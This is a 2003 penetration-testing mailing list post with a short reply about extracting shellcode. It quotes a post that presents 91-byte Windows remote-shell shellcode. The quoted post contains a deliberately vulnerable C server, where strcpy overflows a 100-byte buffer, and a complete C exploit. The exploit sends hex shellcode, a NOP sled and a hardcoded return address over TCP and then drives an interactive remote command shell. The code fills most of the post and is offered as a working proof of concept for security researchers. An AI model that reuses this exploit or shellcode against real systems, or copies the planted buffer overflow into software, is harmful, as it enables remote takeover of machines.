Penetration Testing mailing list archives
Re: Advances In Windows Shellcode
From: "Ing. Bernardo Lopez" <bloodk () prodigy net mx>
Date: 01 Jan 2003 18:32:20 -0600
I know this is not the faster way but... Could be more easy to get the shellcode if you put in your program and rebuild it (whitin a debugger, like softice)then you dump that modified addres... Whit this you can split the includes and other extra stuff, just getting the minimal shellcode nesesary... Have a nice day PS:Well then , my hipotetical method or by doing a C prog whit includes and all? El mar, 31-12-2002 a las 23:02, Brett Moore escribió:
Advances in windows shellcode are few and far between. Papers exist detailing the process using anonymous pipes and examples exist showing how to use a socket directly as the handle for stdin, stdout and stderr. RVA techniques can be used to write code that will run regardless of service pack, and there is not often times when shellcode space is extremely limited so we should be happy with universal remote callback shellcode of ~300 bytes. David Litchfield's post regarding using a socket as a handle included a statement: "If you hard code addresses ..... you can get the exploit code down to 160 bytes" Which got me to thinking of how to write smaller remote callback shellcode. What evolved was an idea, and then shellcode which sends a remote shell back, uses only 2 api calls, and is only 91 bytes in size. It does have limited uses, has hardcoded address for SP3, messy, could be refined but should provoke some interesting thought tangents. The code is not commented, is not at all user friendly, and to cut the size of the post is ill formated, but those who seek the answer should be able to get it work. And now I go on holiday, my byte sequence patent should be ready for filing by the time I get back ;) **************************************************************************** ************** * * server.c - Proof Of Concept Exploitable Server */ #include <stdio.h> #include <winsock2.h> unsigned int resolve(char *name) { struct hostent *he; unsigned int ip; if((ip=inet_addr(name))==(-1)) { if((he=gethostbyname(name))==0) return 0; memcpy(&ip,he->h_addr,4); } return ip; } int main(int argc,char *argv[]) { int s; int tsize; char smallbuf[100]; char buf[5000]; WSADATA WSAData; printf("Windows POC Shellcode Tester\n"); if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("WSAStartup failed.\n"); WSACleanup(); exit(1); } memset(buf,0x00,sizeof(buf)); memset(smallbuf,0x0,sizeof(buf)); printf("Ready?\n"); s= WSASocket(AF_INET, SOCK_STREAM, IPPROTO_IP,NULL, 0, 0); if(s<0) return -1; memset((char *)&target,0,sizeof(target)); target.sin_family = AF_INET; target.sin_addr.s_addr = 0; target.sin_port = htons(8080); //HTTP if (bind(s, &target, sizeof(target)) == SOCKET_ERROR) { printf("Error: bind() failed.\n"); return -2; } printf("Listening\n"); if (listen(s, 2) == SOCKET_ERROR) { printf("Error: listen() failed.\n"); return -2; } printf("Waiting\n"); s = accept(s, NULL,NULL); printf("Receiving\n"); if (recv(s, buf, sizeof(buf),0) == SOCKET_ERROR) printf("Error: recv() failed.\n"); printf("strcpy\n"); strcpy(smallbuf,buf); printf("Closing?\n"); shutdown(s,2); closesocket(s); printf("done\n"); } **************************************************************************** ************** /* /* exploit.c Proof Of Concept Exploit */ #include <stdio.h> #include <winsock2.h> unsigned int resolve(char *name) { struct hostent *he; unsigned int ip; if((ip=inet_addr(name))==(-1)) { if((he=gethostbyname(name))==0) return 0; memcpy(&ip,he->h_addr,4); } return ip; } int main(int argc,char *argv[]) { int s; int acount; int bytes; int x; char buf[10000]; char buf2[10000]; char tbuf[1000]; char cmdbuf[100]; WSADATA WSAData; printf("Windows Remote Shell POC\n"); if (argc<2) { printf("usage: %s ip \n",argv[0]); return -1; } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("WSAStartup failed.\n"); WSACleanup(); exit(1); } printf("Preparing Exploit Buffer\n"); memset(buf,0x00,sizeof(buf)); memset(buf2,0x00,sizeof(buf2)); strcat(buf2,"CMD.\x90"); strcat(buf2,"\x83\xeb\x04\x83\xec\x78\x80\x72\x03\x2e"); strcat(buf2,"\x33\xdb\x83\xc3\x10\x43\x53\x52\x8b\xfc"); strcat(buf2,"\x33\xc0\x33\xc9\xb1\x60\x50\xe2\xfd\x66"); strcat(buf2,"\xb8\x01\x01\x89\x44\x24\x2c\x83\xc4\x44"); strcat(buf2,"\x53\x53\x53\x83\xec\x38\x8b\xf4\x56\x56"); strcat(buf2,"\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51"); strcat(buf2,"\xbb\x44\x9b\xe9\x77\xff\xd3\x5b\x33\xc9"); strcat(buf2,"\x49\x51\x53\xbb\x28\x78\xe8\x77\xff\xd3"); strcat(buf2,"\x8b\xe7\x5a\x5b\xeb\x00"); printf("Shellcode Size:%d bytes\n",strlen(buf2)); while (strlen(buf2) <100) { strcat(buf2,"\x90"); } strcat(buf,buf2); strcat(buf,"AAAABBBBCCCCDDDD"); strcat(buf,"\x57\x2d\xfd\x74"); strcat(buf,"\x8b\x54\x24\x50\x33\xf6\x81\xee\xbd\xb2\xbb\xd1\x4a\x39\x32\x75 \xfb\x83\xc2\x04\xff\xe2"); printf("Exploit Buffer Ready\n"); printf("Connecting\n"); s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&target,0,sizeof(target)); target.sin_family = AF_INET; target.sin_addr.s_addr = resolve(argv[1]); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons(8080); if (connect(s, &target, sizeof(target)) == SOCKET_ERROR) { printf("Error: connect() failed.\n"); return -2; } printf("Sending Exploit\n"); if (sendto(s, buf, strlen(buf)+ 1, 0, &target, sizeof(target)) == SOCKET_ERROR) printf("Error: sendto() failed.\n"); memset(buf,0x00,sizeof(buf)); printf("Exploit Sent\n"); x=1; ioctlsocket(s,FIONBIO,&x); while (x > 0){ memset(cmdbuf,0x00,sizeof(cmdbuf)); bytes = recv(s, cmdbuf, sizeof(cmdbuf)-1, 0); if (bytes > 0) { cmdbuf[bytes+1] =0x00; printf("%s",cmdbuf); while (recv(s, cmdbuf, sizeof(cmdbuf), MSG_PEEK) > 0) { memset(cmdbuf,0x00,sizeof(cmdbuf)); bytes = recv(s, cmdbuf, sizeof(cmdbuf)-1, 0); if (bytes > 0) { cmdbuf[bytes+1] =0x00; printf("%s",cmdbuf); } } memset(cmdbuf,0x00,sizeof(cmdbuf)); gets(cmdbuf); strcat(cmdbuf+strlen(cmdbuf),"\r\n"); send(s,cmdbuf,strlen(cmdbuf)+1,0); } } closesocket(s); } ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Advances In Windows Shellcode Brett Moore (Jan 01)
- Re: Advances In Windows Shellcode Ing. Bernardo Lopez (Jan 02)
- <Possible follow-ups>
- Re: Advances In Windows Shellcode sk (Jan 21)